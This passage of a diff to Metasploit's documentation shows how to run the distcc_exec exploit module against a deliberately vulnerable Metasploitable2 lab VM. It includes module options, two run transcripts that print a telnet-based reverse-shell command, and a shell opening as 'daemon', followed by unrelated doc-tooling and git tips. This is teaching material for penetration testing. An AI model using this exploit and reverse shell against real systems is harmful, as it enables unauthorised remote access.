- [Metasploitable3](https://github.com/rapid7/metasploitable3)
For instance - targeting a vulnerable Metasploitable2 VM and using the `unix/misc/distcc_exec` module:
```msf
msf6 > use unix/misc/distcc_exec
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) >
```
Exploit modules will generally at a minimum require the following options to be set:
- `RHOST` - The remote target host address
- `LHOST` - The listen address. **Important** This may need to be set to your `tun0` IP address or similar, if you are connecting to your target over a VPN
- `PAYLOAD` - The code to be executed after an exploit is successful. For instance creating a user, or a Metasploit session. Often this can be left as the default value, but may sometimes require configuration
Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
```msf
msf6 exploit(unix/misc/distcc_exec) > options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3632 yes The target port (TCP)
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/misc/distcc_exec) >
```
For this scenario you can manually set each of the required option values (`RHOST`, `LHOST`, and optionally `PAYLOAD`):
```msf
msf6 exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
rhost => 192.168.123.133
msf6 exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
```
The `run` command will run the module against the target, there is also an aliased `exploit` command which will perform the same action:
```msf
msf6 exploit(unix/misc/distcc_exec) > run
[+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.123.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BmpMGFX6NDVlh5h0;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "BmpMGFX6NDVlh5h0\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.133:48578) at 2023-09-21 14:42:42 +0100
whoami
daemon
```
New in Metasploit 6 there is added support for running modules with options set as part of the run command:
```msf
msf6 exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse
[+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.123.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo QqL1Uzom6eBFilyL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "QqL1Uzom6eBFilyL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.133:52314) at 2023-09-21 13:52:40 +0100
whoami
daemon
```
@@ -41,3 +41,18 @@ These are just suggestions, but it'd be nice if the KB had these sections:
- **Verification Steps** - Tells users how to use the module and what the expected results are from running the module.
- **Options** - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required.
- **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module.
### Before you submit your PR: msftidy_docs.rb
A documentation file can be passed as a positional argument to `metasploit-framework/tools/dev/msftidy_docs.rb` and will
highlight formatting errors the docs file might contain. Once all the errors and warnings thrown by `msftidy_docs.rb` have
been resolved, the documentation file is ready for submission.
```
➜ metasploit-framework git:(upstream-master) ✗ ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/panos_op_cmd_exec.md
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [INFO] Missing Section: ## Options
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] Please add a newline at the end of the file
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps/Module usage, Options, Scenarios
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:50 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:53 - [WARNING] Spaces at EOL
```
@@ -176,7 +176,7 @@ git config commit.gpgsign true
Developers tend to customize their own [git aliases] to speed up common commands, but here are a few common ones:
```
```ini
[alias]
# An easy, colored oneline log format that shows signed/unsigned status
nicelog = log --pretty=format:'%Cred%h%Creset -%Creset %s %Cgreen(%cr) %C(bold blue)<%aE>%Creset [%G?]'
@@ -110,8 +110,8 @@ your day-to-day workflow with Git.
## Git in Bash
When using Git, it's very handy (read: pretty much mandatory) to have an ambient cue in your shell telling you what branch you're currently on. Use this function in your .profile/.bashrc/.bash_profile to enable you to place your Git branch in your prompt:
````
```sh
function parse_git_branch {
git branch --no-color 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/(\1)/'
}
````
```

Some files were not shown because too many files have changed in this diff Show More